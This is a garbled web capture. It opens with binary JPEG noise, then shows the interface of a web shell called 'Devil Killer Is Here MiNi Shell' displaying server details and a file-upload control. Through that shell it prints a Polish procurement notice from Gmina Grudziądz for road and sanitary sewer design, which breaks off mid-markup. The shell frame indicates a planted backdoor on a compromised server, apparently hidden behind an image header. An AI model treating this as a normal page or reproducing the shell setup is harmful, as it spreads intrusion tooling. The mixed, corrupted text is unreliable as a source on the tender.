JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240327/0026288501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowej na zadanie &#34;Przebudowa drogi gminnej nr 040565C wraz z budową sieci kanalizacji sanitarnej w miejscowości Pieńki Królewskie” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA GRUDZIĄDZ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">stanowisko ds. zamówień publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118626</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. J. Wybickiego 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Grudziądz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">86-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@grudziadz.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.grudziadz.lo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowej na zadanie &#34;Przebudowa drogi gminnej nr 040565C wraz z budową sieci kanalizacji sanitarnej w miejscowości Pieńki Królewskie” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e3033d53-ec3b-11ee-9c02-ce2b643d361d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00262885</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00037939/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Opracowanie dokumentacji projektowej na zadanie pn. Rozbudowa drogi gminnej nr 040565C w miejscowości Pieńki Królewskie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-e3033d53-ec3b-11ee-9c02-ce2b643d361d <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>5. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań, zawiadomień i zadawanie pytań. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>6. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>7. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>8. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>9. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>10. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>11. Zamawiający przekazuje dokumenty na adres poczty elektronicznej wskazany w formularzu ofertowym Wykonawcy, na co Wykonawca wyraża zgodę wskazując ten adres w ofercie i zobowiązuje się do utrzymania jego funkcjonalności przez czas trwania postępowania. Domniemywa się, że dokumenty, oświadczenia i wnioski przekazane na adres poczty elektronicznej wskazany w formularzu ofertowym zostały doręczone skutecznie, a Wykonawca zapoznał się z ich treścią.<br/>12. Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail (NIE DOTYCZY SKŁADANIA OFERT):<br/>1) W zakresie formalnym: Paulina Topolewska-Dziewicka - tel.: (56) 45 111 08,<br/>e-mail: p.topolewska_dziewicka@grudziadz.ug.gov.pl<br/>2) W zakresie merytorycznym: Magdalena Możdzyńska<br/>– tel.: (56) 45 111 01, e-mail: srodowisko@grudziadz.ug.gov.pl.<br/>Mateusz Tarczykowski<br/>– tel.: (56) 45 111 22, e-mail: m.tarczykowski@grudziadz.ug.gov.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający<br/>informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Opracowanie dokumentacji projektowej na zadanie &#34;Przebudowa drogi gminnej nr 040565C wraz z budową sieci kanalizacji sanitarnej w miejscowości Pieńki Królewskie” prowadzonym w trybie podstawowym;<br/>3) w sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem Ochrony Danych pod adresem e-mail: inspektor@cbi24.pl<br/>4) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z późn. zm.), dalej „ustawa Pzp”;<br/>5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>6) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>8) Wykonawca posiada:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>− na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza integralności protokołu oraz jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wykonawcy nie przysługuje:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.7.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest opracowanie dokumentacji projektowej na zadanie &#34;Przebudowa drogi gminnej nr 040565C wraz z budową sieci kanalizacji sanitarnej w miejscowości Pieńki Królewskie” wraz z uzyskaniem dwóch odrębnych decyzji administracyjnych niezbędnych do realizacji inwestycji.<br/>2. Zakres przedmiotu zamówienia obejmuje opracowanie dwóch oddzielnych dokumentacji dla branży drogowej i branży sanitarnej oraz uzyskanie odrębnie dla każdej niezbędnych decyzji administracyjnych.<br/>3. Decyzja o zezwoleniu na realizację inwestycji drogowej musi uwzględniać miejsce na wybudowanie kanalizacji sanitarnej na odcinku projektowanej drogi (zakres drogi w pkt. 4.10).<br/>4. Wykonawca jest zobowiązany wykonać dokumentację projektową zgodnie<br/>z obowiązującymi przepisami prawa i normami, zasadami wiedzy technicznej<br/>i sztuki budowlanej. Dokumentacja projektowa powinna być kompletna, zawierać wszystkie niezbędne opinie, uzgodnienia i zatwierdzenia tak, aby możliwa była na ich podstawie realizacja inwestycji budowlanej, zgodnie<br/>z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. z 2021 r., poz. 2454).<br/>5. Przedmiot zamówienia obejmuje nadzór autorski w szczególności w zakresie stwierdzenia zgodności realizacji robót budowlanych z dokumentacją projektową oraz wyjaśnienia wątpliwości dotyczących rozwiązań przyjętej dokumentacji.<br/>6. Wszelkie koszty związane z uzyskaniem materiałów wyjściowych do projektowania oraz uzyskaniem uzgodnień, opinii, decyzji itp. ponosi w całości Wykonawca.<br/>7. Projektant zobowiązany jest do posiadania wymaganych obowiązującymi przepisami uprawnień, konieczne doświadczenie i kwalifikacje zawodowe do wykonania zadania. Ponadto dysponuje niezbędnym zapleczem technicznym<br/>i osobowym do ich przeprowadzenia i nie widzi przeszkód do pełnego oraz terminowego wykonania niniejszej umowy.<br/>8. Projektant ma obowiązek uzgadniania z Zamawiającym dobór materiałów budowlanych i standardu wykończenia w rozwiązaniach projektowych. Opisywanie proponowanych materiałów i urządzeń dokonywane będzie za pomocą szczegółowych parametrów technicznych bez podawania ich nazw, za wyjątkiem sytuacji, gdzie opisanie w ten sposób materiałów lub urządzeń nie będzie możliwe. W takim wypadku Opisowi towarzyszyć będzie zwrot „lub równoważny”. Wykonawca sporządzi oświadczenie o braku znaków towarowych<br/>w sporządzonym przez niego projekcie. W przypadku zastosowania konkretnych rozwiązań technicznych lub przy dostawie urządzeń zwracamy uwagę na konieczność posiadania danych o tym, że wymagane parametry spełnia więcej niż jeden produkt na rynku. Zapewnienie takie /wraz z kartami katalogowymi produktów, które spełniają wymogi zamawiającego Wykonawca dołączy do dokumentacji projektowej.<br/>9. Zakres zamówienia branży sanitarnej obejmuje:<br/>9.1. Planowana długość sieci kanalizacji sanitarnej wynosi ok. 8,2 km. Obszar projektowanej sieci wskazano na mapie poglądowej stanowiącej załącznik do niniejszej umowy.<br/>9.2. Dokumentacja ma obejmować połączenie wybudowanej (nieaktywnej) sieci kanalizacji sanitarnej w Białym Borze z aktywną siecią kanalizacyjną<br/>w mieście Grudziądzu zgodnie z wydanymi warunkami przez Miejskie Wodociągi i Oczyszczalnię Sp. z o.o. w Grudziądzu i Gminę Grudziądz<br/>9.3. W uzgodnieniu z Zamawiającym projektowana długość przewodów kanalizacyjnych może ulec zmianie po zweryfikowaniu przez projektanta lokalizacji istniejącej i projektowanej infrastruktury oraz możliwości ich wykonania.<br/>9.4. Projekt budowlany musi spełniać wymogi określone w ustawie z dnia 7 lipca 1994 r. – Prawo budowlane (Dz. U. z 2023 r., poz. 682 z późn. zm.). Szczegółowy zakres i formę dokumentacji określa Rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 w sprawie szczegółowego zakresu<br/>i formy dokumentacji projektowej, specyfikacji technicznych wykonania<br/>i odbioru robót budowlanych oraz programu funkcjonalno–użytkowego<br/>(Dz. U. z 2021 r., poz. 2454).<br/>9.5. Dokumentację należy wykonać w oparciu o uzyskane warunki techniczne od Zamawiającego i Miejskich Wodociągów i Oczyszczalni Sp. z o.o.<br/>9.6. Dokumentacja powinna zawierać decyzję o środowiskowych uwarunkowaniach, decyzję celu publicznego oraz decyzję na wycinkę drzew<br/>i krzewów kolidujących z inwestycją.<br/>9.7. Opracowanie kompletnej dokumentacji projektowej w 5 egzemplarzach<br/>w formie pisemnej i 1 egzemplarzu utrwalonym na nośniku elektronicznym (nośnik CD, format zapisu .pdf, .dwg). Zakres dokumentacji obejmuje sporządzenie wszelkich niezbędnych dokumentów do uzyskania decyzji administracyjnych niezbędnych do realizacji inwestycji oraz ogłoszenia postępowania o udzielenie zamówienia publicznego, w szczególności:<br/>1) koncepcje techniczne kanalizacji sanitarnej (wariantowe),<br/>2) mapy stanu prawnego,<br/>3) badania geologiczne,<br/>4) dokumentacje geotechniczne lub geologiczno-inżynierskie<br/>5) projekt organizacji ruchu na czas budowy,<br/>6) projekty odbudowy nawierzchni drogowych,<br/>7) dokumentacje dendrologiczne wycinki drzew,<br/>8) złożenie wniosku i uzyskanie decyzji o środowiskowych uwarunkowaniach,<br/>9) złożenie wniosku i uzyskanie decyzji o lokalizacji inwestycji celu publicznego,<br/>10) ewentualne operaty wodnoprawne wraz z uzyskaniem pozwolenia wodnoprawnego,<br/>11) projekty budowlane sieci kanalizacyjnej ze złożeniem wniosku i uzyskaniem decyzji administracyjnej,<br/>12) projekty wykonawcze sieci kanalizacyjnej,<br/>13) przedmiary i kosztorysy (o formie papierowej oraz elektronicznej),<br/>14) uzyskanie oświadczeń wyrażających zgodę na zaprojektowanie oraz wykonanie sieci kanalizacji sanitarnej lub/i przyłącza kanalizacji,<br/>15) specyfikacje techniczne wykonania i odbioru robót,<br/>16) inne opracowania wynikające z uzgodnień i decyzji oraz przepisów prawa, w tym w szczególności o ochronie i opiece nad zabytkami.<br/>10. Zakres zamówienia branży drogowej obejmuje:<br/>10.1. Zadanie obejmuje zaprojektowanie drogi o nawierzchni bitumicznej<br/>o długości 1,2 km i szerokości zmiennej od 3,5 do 5,0 m z poboczami<br/>o szerokości 0,75 m - podbudowa z kruszywa łamanego i dwie warstwy<br/>z betonu asfaltowego. Ponadto w ramach zadania należy zaprojektować oświetlenie uliczne w technologii LED, przebudowę, odbudowę rowów<br/>i przepustów odwodnienie powierzchniowe do istniejących rowów i/lub za pośrednictwem sieć kanalizacji deszczowej. Zamawiający zaznacza, że może zaistnieć konieczność przebudowy kolizji z infrastrukturą podziemną<br/>i naziemną. Ponadto projekt techniczny powinien także obejmować zaprojektowanie wjazdów, inwentaryzację drzew do wycinki oraz organizację ruchu z zastosowaniem znaków aktywnych.<br/>10.2. Przedmiot zamówienia obejmuje wykonania kompletnej dokumentacji projektowej, w tym: projektów wykonawczych, Specyfikacji Technicznych Wykonania i Odbioru Robót Budowlanych, przedmiarów oraz kosztorysów inwestorskich w branżach: drogowej, sanitarnej i elektrycznej, projektów przebudowy kolizji z istniejącą infrastrukturą podziemną i naziemną, oraz uzyskanie w imieniu Zamawiającego decyzji o zezwoleniu na realizację inwestycji drogowej.<br/>10.3. Dokumentacja projektowa powinna być wykonana zgodnie z Rozporządzeniem Ministra Rozwoju z dnia 11 września 2020 roku w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. z 2022 r., poz.1679 t.j.) oraz spełniać wymogi określone w ustawie z dnia 7 lipca 1994 r. – Prawo budowlane (Dz.U. z 2023 r., poz. 682 t.j. ze zm.), ustawie z dnia 21 marca 1985 r. o drogach publicznych (Dz.U. z 2023 r., poz. 645 t.j. ze zm.), ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym (Dz.U. z 2023 r., poz. 1047 t.j. ze zm.), rozporządzeniu Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych. Zamawiający przewiduje konieczności realizacji zadania w oparciu o ustawę z dnia z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz.U. z 2023 r., poz. 162 t.j.).<br/>10.4. Opracowanie kompletnej dokumentacji projektowej w 5 egzemplarzach w formie pisemnej i 1 egzemplarzu utrwalonym na nośniku elektronicznym (nośnik CD, format zapisu .pdf, .dwg). Zakres dokumentacji obejmuje sporządzenie wszelkich niezbędnych dokumentów do uzyskania decyzji administracyjnych niezbędnych do realizacji inwestycji oraz ogłoszenia postępowania o udzielenie zamówienia publicznego, w szczególności:<br/>1) Projekt budowlany dla każdej branży;<br/>2) Projekty wykonawcze dla każdej branży (jeżeli obowiązek ich wykonania będzie wynikał z przepisów prawa;<br/>3) Projekt stałej organizacji ruchu;<br/>4) złożenie wniosku i uzyskanie decyzji o środowiskowych uwarunkowaniach<br/>5) Przedmiary robót (w formie papierowej oraz elektronicznej);<br/>6) Kosztorysy inwestorskie (w formie papierowej oraz elektronicznej);<br/>7) Specyfikacja techniczna wykonania i odbioru robót budowlanych;<br/>8) inne opracowania wynikające z uzgodnień i decyzji oraz przepisów prawa, w tym w szczególności o ochronie i opiece nad zabytkami </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71240000-2 - Usługi architektoniczne, inżynieryjne i planowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe personelu - branża drogowa</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span 